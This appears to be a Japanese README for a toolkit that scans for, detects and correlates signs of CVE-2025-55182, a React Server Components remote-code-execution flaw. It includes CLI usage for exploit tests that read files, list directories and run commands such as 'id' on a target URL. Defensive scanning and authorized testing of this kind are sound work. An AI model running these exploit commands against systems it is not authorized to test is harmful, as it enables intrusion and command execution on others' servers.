
CVE-2025-55182 (React2Shell) 用セキュリティツールキット — React Server Components RCE の脆弱性をスキャン、検出、関連付け、テストします
flight risk /フライト・リスク/ — ReactのFlightプロトコルは、React Server Componentsの背後にあるシリアライゼーションレイヤーです。CVE-2025-55182は、Flightのデシリアライゼーションの欠陥を悪用して、事前認証RCEを達成します。アプリがRSCを使用している場合、それはflight risk(フライト・リスク)です。
CVE-2025-55182(React2Shell) のためのセキュリティツールキット — React Server ComponentsにおけるCVSS 10.0の事前認証リモートコード実行脆弱性。スキャン、検出、相関付け、テストを行います。
| ツール | 機能 |
|---|---|
| react2shell-scanner | GitHub組織とGCPプロジェクトをスキャンして、脆弱なReact/Next.js依存関係を検出します。許可されたエクスプロイトテスト(セーフプローブ、ファイル読み取り、ディレクトリ一覧、コマンド実行)。 |
| gcp-ioc-scanner | GCP Cloud Loggingを照会して、複数のプロジェクトとK8sサービスにわたる侵害インジケータ(IOC)パターンを検出します。プラグ可能なIOC定義。 |
| gcp-log-correlator | 同じポッド上の時間的近接性に基づいてGCPログイベントを相関付けます — 例:どのHTTPリクエストがRCEエラーを引き起こしたかを特定します。 |
# クローン
git clone https://github.com/YOUR_USER/flight-risk.git
cd flight-risk
# 依存関係のインストール
pip install -r react2shell-scanner/requirements.txt
pip install pyyaml # gcp-ioc-scanner用
# スクリプトを実行可能にする
chmod +x react2shell-scanner/bin/*
chmod +x gcp-ioc-scanner/gcp-ioc-scanner
chmod +x gcp-log-correlator/gcp-log-correlator
# 認証
gh auth login # GitHubスキャン用
gcloud auth application-default login # GCPスキャン+ログ分析用
すべてのコマンドはリポジトリルートから実行します。
react2shell-scanner/bin/scan-github \
--org YOUR_GITHUB_ORG \
--output ./results/github
react2shell-scanner/bin/scan-gcp \
--project YOUR_GCP_PROJECT \
--output ./results/gcp
react2shell-scanner/bin/scan-all \
--org YOUR_GITHUB_ORG \
--project YOUR_GCP_PROJECT \
--output ./results
python3 react2shell-scanner/cli.py https://your-app.example.com
# ドライラン — ペイロードを表示するが送信しない
python3 react2shell-scanner/cli.py --dry-run --verbose https://your-app.example.com
# RCEによるファイル読み取り
python3 react2shell-scanner/cli.py --method read-file https://your-app.example.com /etc/hostname
# RCEによるディレクトリ一覧
python3 react2shell-scanner/cli.py --method list-dir https://your-app.example.com /app
# RCEによるコマンド実行
python3 react2shell-scanner/cli.py --method exec-cmd https://your-app.example.com "id"
# バッチターゲット
python3 react2shell-scanner/cli.py --targets targets.txt --output results.json
gcp-ioc-scanner/gcp-ioc-scanner \
--targets gcp-ioc-scanner/examples/targets-example.yaml \
--iocs gcp-ioc-scanner/iocs/cve-2025-55182.yaml \
--start 2026-01-01 \
--end 2026-04-01 \
--output ./results/ioc-scan
gcp-log-correlator/gcp-log-correlator \
--project YOUR_GCP_PROJECT \
--namespace frontend \
--pod-pattern "web-app.*" \
--trigger-filter 'severity=ERROR' \
--preceding-filter 'httpRequest.requestMethod:*' \
--window 30s \
--start 2026-04-01T00:00:00Z \
--end 2026-04-02T00:00:00Z \
--format json,markdown \
--output ./results/correlation
cd react2shell-scanner
docker compose -f docker/docker-compose.yml build
docker compose -f docker/docker-compose.yml run scanner-shell
flight-risk/
├── README.md
├── LICENSE
├── react2shell-scanner/
│ ├── bin/ # scan-github, scan-gcp, scan-all
│ ├── cli.py # エクスプロイトテストCLI
│ ├── exploit.py # エクスプロイトロジック
│ ├── utils.py # 共有ユーティリティ
│ ├── lib/ # シェル+Pythonヘルパー
│ ├── vuln-defs/ # プラグ可能な脆弱性定義
│ ├── docker/ # コンテナ化スキャン
│ ├── examples/ # サンプルスクリプト
│ ├── test-app/ # 脆弱なNext.jsフィクスチャ
│ └── requirements.txt
├── gcp-ioc-scanner/
│ ├── gcp-ioc-scanner # IOCログスキャナー
│ ├── iocs/ # IOCパターン定義
│ └── examples/ # ターゲット設定例
└── gcp-log-correlator/
├── gcp-log-correlator # イベント相関ツール
└── examples/ # 相関の例
gh)gcloud)jq許可された使用のみ。 このツールキットにはエクスプロイトコードが含まれています。自分が所有するシステム、または明示的な書面によるテスト許可を得たシステムに対してのみ使用してください。許可のない使用は、Computer Fraud and Abuse Act(18 U.S.C. 1030)および同等の法律に違反する可能性があります。
MIT — LICENSE を参照してください。
| CVSS | 10.0 Critical |
| ベクター | ネットワーク / 事前認証 / 操作不要 |
| React | 19.0.0 - 19.2.0(19.3.0で修正) |
| Next.js | 14.3.0 - 15.3.5、16.0.0 - 16.0.7(15.3.6、16.0.8で修正) |
| 根本原因 | React Flightプロトコルにおける安全でないデシリアライゼーション |
| 影響 | アプリケーションプロセスユーザーとしての完全なRCE |